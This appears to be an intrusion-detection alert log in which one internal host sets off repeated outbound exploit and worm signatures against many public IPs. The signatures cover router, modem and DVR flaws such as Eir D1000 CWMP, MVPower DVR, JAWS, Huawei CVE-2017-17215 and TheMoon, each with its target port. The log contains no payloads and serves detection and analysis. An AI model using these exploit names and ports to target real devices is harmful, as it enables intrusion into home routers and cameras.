Timestamp:	03/18/24-09:58:29.456988
SID:	2023548
Source Port:	57774
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 144.91.73.239

Timestamp:	03/18/24-10:00:15.078072
SID:	2025576
Source Port:	42208
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.102.150.31

Timestamp:	03/18/24-10:00:03.637957
SID:	2023548
Source Port:	58682
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 2.19.201.24

Timestamp:	03/18/24-09:57:01.271172
SID:	2025883
Source Port:	52506
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound - Source IP: 192.168.2.23 - Destination IP: 190.133.76.0

Timestamp:	03/18/24-09:58:22.246705
SID:	2027339
Source Port:	55712
Destination Port:	52869
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 184.24.62.8

Timestamp:	03/18/24-09:58:16.192794
SID:	2025883
Source Port:	51548
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.94.151

Timestamp:	03/18/24-09:59:03.304731
SID:	2018132
Source Port:	50664
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.242.210.107

Timestamp:	03/18/24-09:59:02.129662
SID:	2023548
Source Port:	54304
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 175.178.211.161

Timestamp:	03/18/24-09:59:06.306578
SID:	2030092
Source Port:	55752
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.66.201.0

Timestamp:	03/18/24-09:59:57.371218
SID:	2025883
Source Port:	53672
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 106.52.211.17

Timestamp:	03/18/24-09:59:12.787980
SID:	2025576
Source Port:	33936
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 14.46.12.61

Timestamp:	03/18/24-09:59:10.100825
SID:	2030092
Source Port:	49108
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 159.182.7.51

Timestamp:	03/18/24-10:00:22.761963
SID:	2025576
Source Port:	58384
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 13.225.29.213

Timestamp:	03/18/24-09:59:37.522790
SID:	2025576
Source Port:	57208
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 162.241.9.32

Timestamp:	03/18/24-09:58:27.596328
SID:	2025576
Source Port:	55570
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.76.62.210

Timestamp:	03/18/24-09:58:43.006582
SID:	2030092
Source Port:	42546
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 66.248.208.217

Timestamp:	03/18/24-09:59:57.087907
SID:	2023548
Source Port:	35832
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 195.235.69.228

Timestamp:	03/18/24-09:59:06.915265
SID:	2025576
Source Port:	48444
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.199.66.232

Timestamp:	03/18/24-09:58:41.275236
SID:	2023548
Source Port:	40722
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 162.247.236.14

Timestamp:	03/18/24-09:59:06.620467
SID:	2030092
Source Port:	50504
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 156.254.79.157

Timestamp:	03/18/24-09:59:22.309690
SID:	2829579
Source Port:	45404
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.92.172

Timestamp:	03/18/24-09:59:36.460690
SID:	2018132
Source Port:	33516
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 37.158.87.209

Timestamp:	03/18/24-09:59:56.972381
SID:	2023548
Source Port:	44132
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.98.254.158

Timestamp:	03/18/24-09:58:55.848504
SID:	2018132
Source Port:	46954
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 86.107.124.239

Timestamp:	03/18/24-09:59:38.057040
SID:	2030092
Source Port:	34168
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 206.238.94.194

Timestamp:	03/18/24-10:00:03.069775
SID:	2025576
Source Port:	47140
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 116.75.228.172

Timestamp:	03/18/24-09:58:50.022342
SID:	2023548
Source Port:	58480
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 211.227.106.13

Timestamp:	03/18/24-09:58:47.321541
SID:	2030092
Source Port:	49062
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 138.100.116.81

Timestamp:	03/18/24-09:59:25.102831
SID:	2030092
Source Port:	51184
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 5.17.27.131

Timestamp:	03/18/24-09:59:47.321020
SID:	2023548
Source Port:	48222
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 52.166.218.239

Timestamp:	03/18/24-09:59:30.111641
SID:	2025576
Source Port:	53808
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.184.46.28

Timestamp:	03/18/24-09:59:49.624389
SID:	2023548
Source Port:	57816
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 20.76.125.11

Timestamp:	03/18/24-10:00:14.969137
SID:	2030092
Source Port:	53858
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 69.164.46.87

Timestamp:	03/18/24-09:58:51.796154
SID:	2030092
Source Port:	56518
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 31.52.24.150

Timestamp:	03/18/24-09:57:00.963591
SID:	2023548
Source Port:	53918
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.106.150

Timestamp:	03/18/24-09:58:23.734623
SID:	2018132
Source Port:	55076
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 35.168.137.77

Timestamp:	03/18/24-09:59:26.202514
SID:	2025576
Source Port:	59748
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 104.228.28.226

Timestamp:	03/18/24-09:58:27.534850
SID:	2025576
Source Port:	59774
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.24.19.129

Timestamp:	03/18/24-09:58:38.496583
SID:	2023548
Source Port:	49854
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 102.134.57.197

Timestamp:	03/18/24-10:00:03.802980
SID:	2030092
Source Port:	59618
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 187.109.233.121

Timestamp:	03/18/24-10:00:21.928131
SID:	2025576
Source Port:	34810
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.105.71.148

Timestamp:	03/18/24-09:59:33.181696
SID:	2018132
Source Port:	44426
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 95.101.63.107

Timestamp:	03/18/24-10:00:15.241995
SID:	2025576
Source Port:	56364
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.116.165

Timestamp:	03/18/24-10:00:23.045925
SID:	2018132
Source Port:	48538
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 69.173.209.98

Timestamp:	03/18/24-09:59:50.456881
SID:	2023548
Source Port:	39798
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.5.80.198

Timestamp:	03/18/24-09:59:03.220732
SID:	2023548
Source Port:	38274
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 125.147.124.167

Timestamp:	03/18/24-10:00:06.230855
SID:	2023548
Source Port:	34924
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.92.208.56

Timestamp:	03/18/24-10:00:06.228875
SID:	2023548
Source Port:	52160
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 185.157.222.190

Timestamp:	03/18/24-10:00:10.566897
SID:	2025576
Source Port:	38574
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 78.189.215.32

Timestamp:	03/18/24-10:00:22.454207
SID:	2023548
Source Port:	46810
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.27.193.199

Timestamp:	03/18/24-09:57:02.052280
SID:	2023548
Source Port:	49420
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 35.190.2.113

Timestamp:	03/18/24-09:59:53.979177
SID:	2030092
Source Port:	34368
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.75.150

Timestamp:	03/18/24-09:58:14.841997
SID:	2018132
Source Port:	60026
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.140.239.121

Timestamp:	03/18/24-09:58:43.269543
SID:	2025883
Source Port:	59332
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 99.86.154.156

Timestamp:	03/18/24-09:59:25.298739
SID:	2025576
Source Port:	57960
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 2.18.161.149

Timestamp:	03/18/24-09:59:41.593627
SID:	2030092
Source Port:	45642
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 2.17.196.113

Timestamp:	03/18/24-09:59:58.193118
SID:	2030092
Source Port:	57128
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 163.182.121.40

Timestamp:	03/18/24-09:57:00.820918
SID:	2023548
Source Port:	47702
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 77.55.170.67

Timestamp:	03/18/24-09:58:20.498156
SID:	2030092
Source Port:	45974
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 124.87.30.108

Timestamp:	03/18/24-09:56:57.745355
SID:	2025883
Source Port:	39664
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 18.66.199.210

Timestamp:	03/18/24-09:58:55.088233
SID:	2025576
Source Port:	49532
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 181.114.153.197

Timestamp:	03/18/24-09:58:48.271437
SID:	2023548
Source Port:	38882
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 101.78.84.68

Timestamp:	03/18/24-10:00:22.652571
SID:	2023548
Source Port:	35416
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.29.96.131

Timestamp:	03/18/24-10:00:21.526455
SID:	2023548
Source Port:	47680
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 211.222.148.118

Timestamp:	03/18/24-09:59:24.063633
SID:	2023548
Source Port:	55414
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 134.122.189.189

Timestamp:	03/18/24-09:57:03.830114
SID:	2025576
Source Port:	35160
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 37.56.101.124

Timestamp:	03/18/24-09:59:37.193547
SID:	2023548
Source Port:	42528
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.88.86.134

Timestamp:	03/18/24-09:57:04.572024
SID:	2018132
Source Port:	55390
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.66.79

Timestamp:	03/18/24-10:00:06.885691
SID:	2018132
Source Port:	33992
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.27.193.199

Timestamp:	03/18/24-09:57:01.911607
SID:	2023548
Source Port:	49352
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.179.211.210

Timestamp:	03/18/24-09:59:36.007874
SID:	2023548
Source Port:	44050
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.211.216

Timestamp:	03/18/24-09:59:07.600819
SID:	2018132
Source Port:	34326
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 43.141.130.162

Timestamp:	03/18/24-09:58:20.642028
SID:	2030092
Source Port:	36170
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.196.111.160

Timestamp:	03/18/24-09:58:45.184042
SID:	2025576
Source Port:	54250
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.201.190.239

Timestamp:	03/18/24-09:59:43.966772
SID:	2030092
Source Port:	52276
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 27.5.80.198

Timestamp:	03/18/24-09:59:02.876812
SID:	2023548
Source Port:	38238
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 170.62.11.198

Timestamp:	03/18/24-09:59:37.562356
SID:	2025883
Source Port:	59802
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 218.156.94.48

Timestamp:	03/18/24-10:00:11.110302
SID:	2030092
Source Port:	55272
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.221.3.247

Timestamp:	03/18/24-09:58:24.521384
SID:	2023548
Source Port:	38186
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 13.234.237.150

Timestamp:	03/18/24-09:59:44.064430
SID:	2025883
Source Port:	35278
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 178.78.3.147

Timestamp:	03/18/24-09:59:15.802548
SID:	2023548
Source Port:	48340
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 86.164.87.45

Timestamp:	03/18/24-09:59:56.051566
SID:	2023548
Source Port:	35116
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.12.126.72

Timestamp:	03/18/24-09:59:57.047404
SID:	2025883
Source Port:	35154
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 79.142.113.113

Timestamp:	03/18/24-09:58:37.291671
SID:	2025883
Source Port:	56528
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.163.184

Timestamp:	03/18/24-09:59:19.268590
SID:	2018132
Source Port:	42106
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 91.81.103.242

Timestamp:	03/18/24-09:59:59.450594
SID:	2025576
Source Port:	40118
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 79.221.242.146

Timestamp:	03/18/24-09:57:05.955824
SID:	2030092
Source Port:	32808
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 91.228.7.126

Timestamp:	03/18/24-10:00:16.427958
SID:	2025883
Source Port:	35986
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.211.72

Timestamp:	03/18/24-10:00:24.351940
SID:	2018132
Source Port:	48548
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.183.113

Timestamp:	03/18/24-09:58:29.159416
SID:	2018132
Source Port:	47932
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 50.2.48.179

Timestamp:	03/18/24-09:58:44.219216
SID:	2025883
Source Port:	47428
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 24.161.61.21

Timestamp:	03/18/24-10:00:21.059085
SID:	2023548
Source Port:	59540
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 220.134.235.161

Timestamp:	03/18/24-09:59:45.367271
SID:	2030092
Source Port:	53842
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 67.231.250.92

Timestamp:	03/18/24-09:58:44.158175
SID:	2030092
Source Port:	47848
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.213.120

Timestamp:	03/18/24-09:58:29.077150
SID:	2018132
Source Port:	34080
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 103.212.211.145

Timestamp:	03/18/24-10:00:16.779484
SID:	2030092
Source Port:	37530
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 52.72.238.151

Timestamp:	03/18/24-10:00:06.414395
SID:	2025576
Source Port:	52078
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.227.42.107

Timestamp:	03/18/24-09:59:03.202599
SID:	2023548
Source Port:	52244
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 72.211.5.73

Timestamp:	03/18/24-10:00:02.744134
SID:	2023548
Source Port:	40484
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.223.73.97

Timestamp:	03/18/24-09:59:03.103709
SID:	2023548
Source Port:	58398
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.213.12

Timestamp:	03/18/24-10:00:24.352523
SID:	2018132
Source Port:	54612
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 146.190.167.132

Timestamp:	03/18/24-10:00:14.782675
SID:	2030092
Source Port:	35434
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.223.73.97

Timestamp:	03/18/24-09:59:02.810494
SID:	2023548
Source Port:	58368
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.82.106.159

Timestamp:	03/18/24-09:59:40.319683
SID:	2023548
Source Port:	34162
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 18.238.21.125

Timestamp:	03/18/24-09:58:44.421994
SID:	2030092
Source Port:	55426
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.29.246.133

Timestamp:	03/18/24-10:00:02.617420
SID:	2030092
Source Port:	52840
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 89.161.147.139

Timestamp:	03/18/24-09:59:54.170365
SID:	2025883
Source Port:	50724
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 112.160.32.251

Timestamp:	03/18/24-09:58:32.703923
SID:	2023548
Source Port:	53584
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.113.73.67

Timestamp:	03/18/24-09:58:36.419407
SID:	2023548
Source Port:	32834
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 136.0.97.153

Timestamp:	03/18/24-09:58:16.954802
SID:	2030092
Source Port:	36394
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 189.110.250.248

Timestamp:	03/18/24-09:58:43.320147
SID:	2023548
Source Port:	59264
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 192.9.237.59

Timestamp:	03/18/24-09:59:24.925504
SID:	2025883
Source Port:	52262
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

